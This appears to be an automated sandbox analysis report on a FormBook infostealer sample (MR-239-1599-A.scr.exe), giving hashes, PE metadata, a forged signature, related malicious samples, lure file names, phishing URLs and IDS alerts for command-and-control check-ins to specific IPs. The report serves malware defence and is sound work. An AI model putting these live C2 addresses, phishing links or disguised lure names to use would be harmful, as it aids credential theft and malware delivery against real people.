                                                                                                                                                                                                        • 91.195.240.19
                                                                                                                                                                                                        Demand G2-2024.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 91.195.240.19
                                                                                                                                                                                                        www.skibinscy-finanse.plletter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 178.211.137.59
                                                                                                                                                                                                        RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 178.211.137.59
                                                                                                                                                                                                        PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 178.211.137.59
                                                                                                                                                                                                        COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 178.211.137.59
                                                                                                                                                                                                        INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 178.211.137.59
                                                                                                                                                                                                        INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 178.211.137.59
                                                                                                                                                                                                        HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 178.211.137.59
                                                                                                                                                                                                        www.maxiwalls.comletter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        RFQ 0400-ENPI-RQMA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        www.paydayloans3.shopletter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 64.190.62.22
                                                                                                                                                                                                        STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 64.190.62.22
                                                                                                                                                                                                        factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 64.190.62.22
                                                                                                                                                                                                        RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 64.190.62.22
                                                                                                                                                                                                        PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 64.190.62.22
                                                                                                                                                                                                        FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 64.190.62.22
                                                                                                                                                                                                        INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 64.190.62.22
                                                                                                                                                                                                        shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 64.190.62.22
                                                                                                                                                                                                        INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 64.190.62.22
                                                                                                                                                                                                        HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 64.190.62.22

                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        RACKRAYUABRakrejusLTletter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        prnportccy.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 194.135.87.0
                                                                                                                                                                                                        INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        RFQ 0400-ENPI-RQMA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 79.98.25.1
                                                                                                                                                                                                        NQYYUvHu8f.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                        • 195.181.245.38
                                                                                                                                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUSEN36clwqq9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 20.62.103.58
                                                                                                                                                                                                        RHC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 13.107.253.70
                                                                                                                                                                                                        https://vk.com/away.php?to=https://sigtn.com////////utils/emt.cfm?client_id=9195153%26campaign_id=73466%26link=neoparts.com.br/dayo/ljdr/YWxvay5hdHJpQG1hcmluYWJheXNhbmRzLmNvbQ==$Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 20.93.211.47
                                                                                                                                                                                                        https://vk.com/away.php?to=https://sigtn.com////////utils/emt.cfm?client_id=9195153%26campaign_id=73466%26link=neoparts.com.br/dayo/ovu5/ZGVlbWEuYW1tYXJAYmVpbi5jb20=$Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 20.93.211.47
                                                                                                                                                                                                        https://flow.page/clipasdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 20.96.87.156
                                                                                                                                                                                                        https://prezi.com/i/vxx6nxoawzkb/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                        • 13.107.43.14
                                                                                                                                                                                                        https://flow.page/paliodocsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 20.96.87.156
                                                                                                                                                                                                        letter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 13.94.60.40
                                                                                                                                                                                                        https://docusign-auth.com/?fyimjfzxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 52.97.233.2
                                                                                                                                                                                                        yyyyyyyyyyyy.msgGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                                                        • 52.109.0.142
                                                                                                                                                                                                        UNIFIEDLAYER-AS-1USletter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 162.240.81.18
                                                                                                                                                                                                        p29D3FgSJF3zkbt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 162.241.61.23
                                                                                                                                                                                                        Payment Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • 192.185.129.60
                                                                                                                                                                                                        IUCrkcRx5g.exeGet hashmaliciousAgentTesla, Discord Token Stealer, PureLog StealerBrowse
                                                                                                                                                                                                        • 192.254.232.209
                                                                                                                                                                                                        https://t.co/q6ERXNBypPGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.241.63.82
                                                                                                                                                                                                        5HR6GXEamJ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 50.116.87.114
                                                                                                                                                                                                        Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • 108.167.140.123
                                                                                                                                                                                                        BBVA-Confirming Facturas Pagadas al Vencimiento.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • 192.185.137.4
                                                                                                                                                                                                        Purchase Order_#400388875.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • 192.185.143.105
                                                                                                                                                                                                        DHL OUTSTANDING.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • 50.87.253.239
                                                                                                                                                                                                        DNC-ASDimensionNetworkCommunicationLimitedHKDagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 147.92.36.247
                                                                                                                                                                                                        factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 103.93.125.69
                                                                                                                                                                                                        RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 103.93.125.69
                                                                                                                                                                                                        confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 103.93.125.69
                                                                                                                                                                                                        Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 147.92.36.247
                                                                                                                                                                                                        PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 103.93.125.69
                                                                                                                                                                                                        FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 103.93.125.68
                                                                                                                                                                                                        FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 103.93.127.88
                                                                                                                                                                                                        INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 103.93.124.160
                                                                                                                                                                                                        INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 103.93.124.160
                                                                                                                                                                                                        ONEANDONE-ASBrauerstrasse48DEletter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 217.76.128.34
                                                                                                                                                                                                        p29D3FgSJF3zkbt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 217.160.0.46
                                                                                                                                                                                                        what is a mutual legal reserve company 20594.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 77.68.5.26
                                                                                                                                                                                                        Order confirmation F20 - 011 PURCHASE ORDER.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 212.227.172.253
                                                                                                                                                                                                        Forligsmnd.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 217.76.132.187
                                                                                                                                                                                                        RE Draft BL for BK#440019497 REF#388855.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 217.160.0.185
                                                                                                                                                                                                        STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 217.160.0.111
                                                                                                                                                                                                        LS24SDE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 217.160.0.163
                                                                                                                                                                                                        payment-order90094983.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 213.171.195.105
                                                                                                                                                                                                        kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 217.160.0.111

                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MR-239-1599-A.scr.exe.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\MR-239-1599-A.scr.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\C3vB7APK

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\replace.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):7.9588557022835715
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                        File name:MR-239-1599-A.scr.exe
                                                                                                                                                                                                        File size:761'352 bytes
                                                                                                                                                                                                        MD5:f53a5b00eaa86439c9bf502a7550f48a
                                                                                                                                                                                                        SHA1:e4f80447b09e17553bcbd8925662c9d1d3560ec7
                                                                                                                                                                                                        SHA256:f82f959fe8660a9975cbd0255ba069507af5bdb24dc88b47b275ff98fbae0afb
                                                                                                                                                                                                        SHA512:801bd0b24a9beba576510c0fec2611280845dfe08c7b2e6af4db1a9fff15d49b71e6db0d80ceaae2bea4884b41372f8f0ef15834c7883abcc9cb44a6f9dbf960
                                                                                                                                                                                                        SSDEEP:12288:OyniETpbHidP4i6ilyczuHQYIHbyVyi3z7xdbWOfOEmi89Dj3TBurYcutGAkR:n7bHJQlw5VV37idXlDBY4Mn
                                                                                                                                                                                                        TLSH:19F4231177196F03F3A928305AA980419FB593F37052C64F52C775AF0AE97280B96BBF
                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:f..............0..8...(.......V... ...`....@.. ....................................@................................

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:447a705452e4f047

                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Entrypoint:0x4b560e
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x663AEBAA [Wed May 8 03:04:10 2024 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                        • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                                                                                                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                                                                                                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                                                                                                        Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                                                        cmp byte ptr [edi], dh
                                                                                                                                                                                                        inc edi
                                                                                                                                                                                                        aaa
                                                                                                                                                                                                        dec edx
                                                                                                                                                                                                        cmp byte ptr [esi+56h], al
                                                                                                                                                                                                        aaa
                                                                                                                                                                                                        inc ebp
                                                                                                                                                                                                        inc edi
                                                                                                                                                                                                        push edx
                                                                                                                                                                                                        cmp byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        inc ebx
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        xor al, 38h
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        xor al, 38h
                                                                                                                                                                                                        inc esi
                                                                                                                                                                                                        inc esp
                                                                                                                                                                                                        pop edx
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb55ba0x4f.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x19a0.rsrc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xb68000x3608
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xb80000xc.reloc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb3ec40x54.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                        Sections

                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                        .text0x20000xb36340xb3800aaeec8506b97a9642dc890031e7bf6bfFalse0.9729255527506964data7.975940518665788IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .rsrc0xb60000x19a00x200024297bfeab57383e71c32d50eeb927b6False0.2708740234375data5.681453507468558IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .reloc0xb80000xc0x800352c480b2212d6f6727fe77e6f5fb30bFalse0.015625data0.03037337037012526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                        Resources

                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                        RT_ICON0xb61480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.2628986866791745
                                                                                                                                                                                                        RT_ICON0xb71f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.525709219858156
                                                                                                                                                                                                        RT_GROUP_ICON0xb76580x22data0.9411764705882353
                                                                                                                                                                                                        RT_GROUP_ICON0xb767c0x14data1.05
                                                                                                                                                                                                        RT_VERSION0xb76900x310data0.46938775510204084

                                                                                                                                                                                                        Imports

                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        05/08/24-18:23:04.241190TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        05/08/24-18:21:29.283237TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975280192.168.2.4217.76.128.34
